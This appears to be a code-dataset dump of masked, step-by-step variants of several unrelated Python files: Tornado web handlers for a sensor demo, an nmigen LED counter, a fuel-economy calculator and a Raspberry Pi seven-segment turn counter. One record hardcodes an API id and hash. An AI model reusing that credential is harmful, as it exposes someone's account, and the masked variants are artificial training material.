"step-1": "<mask token>\n",
"step-2": "api_id = '2168275'\napi_hash = 'e011a9cb95b7e7e153aa5840985fc883'\n",
"step-3": "api_id = \"2168275\"\napi_hash = \"e011a9cb95b7e7e153aa5840985fc883\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class UIHBarrier(UIHandler):
<|reserved_special_token_0|>
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class UIHandler(RequestHandler):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(os.path.join(self.application.template_home,
'home.html'), **self.get_template_args())
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Barrière optique'
self.render(os.path.join(self.application.template_home,
'barrier.html'), **template_args)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
__author__ = 'Eric Pascual'
<|reserved_special_token_0|>
class UIHandler(RequestHandler):
def get_template_args(self):
return {'app_title': 'Capteurs de lumière et de couleur'}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(os.path.join(self.application.template_home, 'nyi.html'
), **self.get_template_args())
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(os.path.join(self.application.template_home,
'home.html'), **self.get_template_args())
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Barrière optique'
self.render(os.path.join(self.application.template_home,
'barrier.html'), **template_args)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
__author__ = 'Eric Pascual'
from tornado.web import RequestHandler
import os
class UIHandler(RequestHandler):
def get_template_args(self):
return {'app_title': 'Capteurs de lumière et de couleur'}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(os.path.join(self.application.template_home, 'nyi.html'
), **self.get_template_args())
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(os.path.join(self.application.template_home,
'home.html'), **self.get_template_args())
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Barrière optique'
self.render(os.path.join(self.application.template_home,
'barrier.html'), **template_args)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur noir/blanc'
self.render(os.path.join(self.application.template_home,
'bwdetector.html'), **template_args)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = 'Détecteur couleur'
self.render(os.path.join(self.application.template_home,
'colordetector.html'), **template_args)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['calibration_cfg'
] = self.application.controller.get_calibration_cfg_as_dict()
self.render(os.path.join(self.application.template_home,
'calibration.html'), **template_args)
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Eric Pascual'
from tornado.web import RequestHandler
import os
class UIHandler(RequestHandler):
def get_template_args(self):
return {
'app_title':"Capteurs de lumière et de couleur"
}
def get(self, *args, **kwargs):
""" By default, the get method displays the "Not yet implemented message".
"""
self.render(
os.path.join(self.application.template_home, "nyi.html"),
**self.get_template_args()
)
class UIHome(UIHandler):
def get(self, *args, **kwargs):
self.render(
os.path.join(self.application.template_home, "home.html"),
**self.get_template_args()
)
class UIHBarrier(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Barrière optique"
self.render(
os.path.join(self.application.template_home, "barrier.html"),
**template_args
)
class UIWBDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Détecteur noir/blanc"
self.render(
os.path.join(self.application.template_home, "bwdetector.html"),
**template_args
)
class UIColorDetector(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args['demo_title'] = "Détecteur couleur"
self.render(
os.path.join(self.application.template_home, "colordetector.html"),
**template_args
)
class UICalibration(UIHandler):
def get(self, *args, **kwargs):
template_args = self.get_template_args()
template_args["calibration_cfg"] = self.application.controller.get_calibration_cfg_as_dict()
self.render(
os.path.join(self.application.template_home, "calibration.html"),
**template_args
)
|
flexible
|
{
"blob_id": "b13d4b0ccb693fb97befb4ee47974d8ee076b52b",
"index": 5177,
"step-1": "<mask token>\n\n\nclass UIHBarrier(UIHandler):\n <mask token>\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-2": "<mask token>\n\n\nclass UIHandler(RequestHandler):\n <mask token>\n <mask token>\n\n\nclass UIHome(UIHandler):\n\n def get(self, *args, **kwargs):\n self.render(os.path.join(self.application.template_home,\n 'home.html'), **self.get_template_args())\n\n\nclass UIHBarrier(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Barrière optique'\n self.render(os.path.join(self.application.template_home,\n 'barrier.html'), **template_args)\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-3": "__author__ = 'Eric Pascual'\n<mask token>\n\n\nclass UIHandler(RequestHandler):\n\n def get_template_args(self):\n return {'app_title': 'Capteurs de lumière et de couleur'}\n\n def get(self, *args, **kwargs):\n \"\"\" By default, the get method displays the \"Not yet implemented message\".\n \"\"\"\n self.render(os.path.join(self.application.template_home, 'nyi.html'\n ), **self.get_template_args())\n\n\nclass UIHome(UIHandler):\n\n def get(self, *args, **kwargs):\n self.render(os.path.join(self.application.template_home,\n 'home.html'), **self.get_template_args())\n\n\nclass UIHBarrier(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Barrière optique'\n self.render(os.path.join(self.application.template_home,\n 'barrier.html'), **template_args)\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-4": "__author__ = 'Eric Pascual'\nfrom tornado.web import RequestHandler\nimport os\n\n\nclass UIHandler(RequestHandler):\n\n def get_template_args(self):\n return {'app_title': 'Capteurs de lumière et de couleur'}\n\n def get(self, *args, **kwargs):\n \"\"\" By default, the get method displays the \"Not yet implemented message\".\n \"\"\"\n self.render(os.path.join(self.application.template_home, 'nyi.html'\n ), **self.get_template_args())\n\n\nclass UIHome(UIHandler):\n\n def get(self, *args, **kwargs):\n self.render(os.path.join(self.application.template_home,\n 'home.html'), **self.get_template_args())\n\n\nclass UIHBarrier(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Barrière optique'\n self.render(os.path.join(self.application.template_home,\n 'barrier.html'), **template_args)\n\n\nclass UIWBDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur noir/blanc'\n self.render(os.path.join(self.application.template_home,\n 'bwdetector.html'), **template_args)\n\n\nclass UIColorDetector(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = 'Détecteur couleur'\n self.render(os.path.join(self.application.template_home,\n 'colordetector.html'), **template_args)\n\n\nclass UICalibration(UIHandler):\n\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['calibration_cfg'\n ] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(os.path.join(self.application.template_home,\n 'calibration.html'), **template_args)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Eric Pascual'\n\nfrom tornado.web import RequestHandler\nimport os\n\nclass UIHandler(RequestHandler):\n def get_template_args(self):\n return {\n 'app_title':\"Capteurs de lumière et de couleur\"\n }\n\n def get(self, *args, **kwargs):\n \"\"\" By default, the get method displays the \"Not yet implemented message\".\n \"\"\"\n self.render(\n os.path.join(self.application.template_home, \"nyi.html\"),\n **self.get_template_args()\n )\n\n\nclass UIHome(UIHandler):\n def get(self, *args, **kwargs):\n self.render(\n os.path.join(self.application.template_home, \"home.html\"),\n **self.get_template_args()\n )\n\n\nclass UIHBarrier(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = \"Barrière optique\"\n\n self.render(\n os.path.join(self.application.template_home, \"barrier.html\"),\n **template_args\n )\n\n\nclass UIWBDetector(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = \"Détecteur noir/blanc\"\n\n self.render(\n os.path.join(self.application.template_home, \"bwdetector.html\"),\n **template_args\n )\n\n\nclass UIColorDetector(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args['demo_title'] = \"Détecteur couleur\"\n\n self.render(\n os.path.join(self.application.template_home, \"colordetector.html\"),\n **template_args\n )\n\n\nclass UICalibration(UIHandler):\n def get(self, *args, **kwargs):\n template_args = self.get_template_args()\n template_args[\"calibration_cfg\"] = self.application.controller.get_calibration_cfg_as_dict()\n self.render(\n os.path.join(self.application.template_home, \"calibration.html\"),\n **template_args\n )\n\n\n",
"step-ids": [
7,
11,
14,
15,
16
]
}
|
[
7,
11,
14,
15,
16
] |
from nmigen import *
class Top(Elaboratable):
def __init__(self):
self.counter = Signal(3)
self.led = Signal()
def elaborate(self, platform):
m = Module()
m.d.comb += self.led.eq(self.counter[2])
m.d.sync += self.counter.eq(self.counter + 1)
return m
|
normal
|
{
"blob_id": "22b6ea64cdb109e1c6b2536b50935d09d37a7e1a",
"index": 3057,
"step-1": "<mask token>\n\n\nclass Top(Elaboratable):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Top(Elaboratable):\n <mask token>\n\n def elaborate(self, platform):\n m = Module()\n m.d.comb += self.led.eq(self.counter[2])\n m.d.sync += self.counter.eq(self.counter + 1)\n return m\n",
"step-3": "<mask token>\n\n\nclass Top(Elaboratable):\n\n def __init__(self):\n self.counter = Signal(3)\n self.led = Signal()\n\n def elaborate(self, platform):\n m = Module()\n m.d.comb += self.led.eq(self.counter[2])\n m.d.sync += self.counter.eq(self.counter + 1)\n return m\n",
"step-4": "from nmigen import *\n\n\nclass Top(Elaboratable):\n\n def __init__(self):\n self.counter = Signal(3)\n self.led = Signal()\n\n def elaborate(self, platform):\n m = Module()\n m.d.comb += self.led.eq(self.counter[2])\n m.d.sync += self.counter.eq(self.counter + 1)\n return m\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(round(km / cg, 3), 'km/l')
<|reserved_special_token_1|>
km = float(input())
cg = float(input())
print(round(km / cg, 3), 'km/l')
<|reserved_special_token_1|>
km=float(input())
cg=float(input())
print(round(km/cg,3),"km/l")
|
flexible
|
{
"blob_id": "db33f7386d1eacbfbfd29aa367df310c557ae864",
"index": 8520,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(round(km / cg, 3), 'km/l')\n",
"step-3": "km = float(input())\ncg = float(input())\nprint(round(km / cg, 3), 'km/l')\n",
"step-4": "km=float(input())\ncg=float(input())\nprint(round(km/cg,3),\"km/l\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
<|reserved_special_token_0|>
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(reset, GPIO.IN)
GPIO.setup(minus, GPIO.IN)
GPIO.setup(more, GPIO.IN)
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
led1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32), ('e', 26), ('d', 24), (
'c', 22)]
led2 = [('g', 19), ('f', 15), ('a', 13), ('b', 11), ('e', 7), ('d', 5), (
'c', 3)]
numbers = [('a', 'b', 'c', 'd', 'e', 'f'), ('b', 'c'), ('a', 'b', 'g', 'e',
'd'), ('a', 'b', 'g', 'c', 'd'), ('f', 'g', 'b', 'c'), ('a', 'f', 'g',
'c', 'd'), ('a', 'f', 'g', 'c', 'd', 'e'), ('a', 'b', 'c'), ('a', 'b',
'c', 'd', 'e', 'f', 'g'), ('a', 'b', 'c', 'd', 'f', 'g')]
reset = 12
minus = 16
more = 18
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(reset, GPIO.IN)
GPIO.setup(minus, GPIO.IN)
GPIO.setup(more, GPIO.IN)
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print('-' * 20 + ' RESET ' + '-' * 20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print('Numero actual = ' + str(contador))
time.sleep(0.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador - 1
print('Numero actual = ' + str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(0.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print('Presione un boton para continuar')
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import RPi.GPIO as GPIO
import time
from datetime import datetime
led1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32),
('e', 26), ('d', 24), ('c', 22)]
led2 = [('g', 19), ('f', 15), ('a', 13),
('b', 11), ('e', 7), ('d', 5), ('c', 3)]
numbers = [
('a', 'b', 'c', 'd', 'e', 'f'),
('b', 'c'),
('a', 'b', 'g', 'e', 'd'),
('a', 'b', 'g', 'c', 'd'),
('f', 'g', 'b', 'c'),
('a', 'f', 'g', 'c', 'd'),
('a', 'f', 'g', 'c', 'd', 'e'),
('a', 'b', 'c'),
('a', 'b', 'c', 'd', 'e', 'f', 'g'),
('a', 'b', 'c', 'd', 'f', 'g')
]
reset = 12
minus = 16
more = 18
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
GPIO.setup(reset, GPIO.IN)
GPIO.setup(minus, GPIO.IN)
GPIO.setup(more, GPIO.IN)
def setupLed1():
for port in led1:
GPIO.setup(port[1], GPIO.OUT)
def setupLed2():
for port in led2:
GPIO.setup(port[1], GPIO.OUT)
def statusLed(port, status):
GPIO.output(port, status)
def turnOnAllLeds():
for led in led1:
statusLed(led[1], True)
for led in led2:
statusLed(led[1], True)
def turnOffAllLeds():
for led in led1:
statusLed(led[1], False)
for led in led2:
statusLed(led[1], False)
def turnOffOneLed(led):
for port in led:
statusLed(port[1], False)
def createNumber(ledNumber, number):
turnOffOneLed(ledNumber)
for i in range(10):
if number == i:
for letter in numbers[i]:
for led in ledNumber:
if led[0] == letter:
statusLed(led[1], True)
def createNumber2Leds(led1, led2, number):
if number < 10:
createNumber(led1, 0)
createNumber(led2, number)
else:
decenas = number / 10
unidades = number % 10
createNumber(led1, decenas)
createNumber(led2, unidades)
def titileoNumber2Leds(led1, led2, number):
for i in range(3):
turnOffAllLeds()
time.sleep(0.25)
createNumber2Leds(led1, led2, number)
time.sleep(0.25)
def digiTurno():
contador = 0
titileoNumber2Leds(led1, led2, contador)
while True:
if GPIO.input(reset):
contador = 0
print("-"*20+" RESET "+"-"*20)
print(datetime.now())
titileoNumber2Leds(led1, led2, contador)
print("Numero actual = "+str(contador))
time.sleep(.3)
if GPIO.input(more):
if contador < 99:
contador += 1
else:
print(datetime.now())
contador = 0
print("Numero actual = "+str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(.3)
if GPIO.input(minus):
if contador == 0:
contador = 99
else:
contador = contador-1
print("Numero actual = "+str(contador))
createNumber2Leds(led1, led2, contador)
time.sleep(.3)
def main():
setupLed1()
setupLed2()
turnOffAllLeds()
try:
print("Presione un boton para continuar")
digiTurno()
except (KeyboardInterrupt, SystemExit):
GPIO.cleanup()
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "0d022291f9ace02ef1ee5c462657ea6376a0e6a4",
"index": 9436,
"step-1": "<mask token>\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\n<mask token>\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n 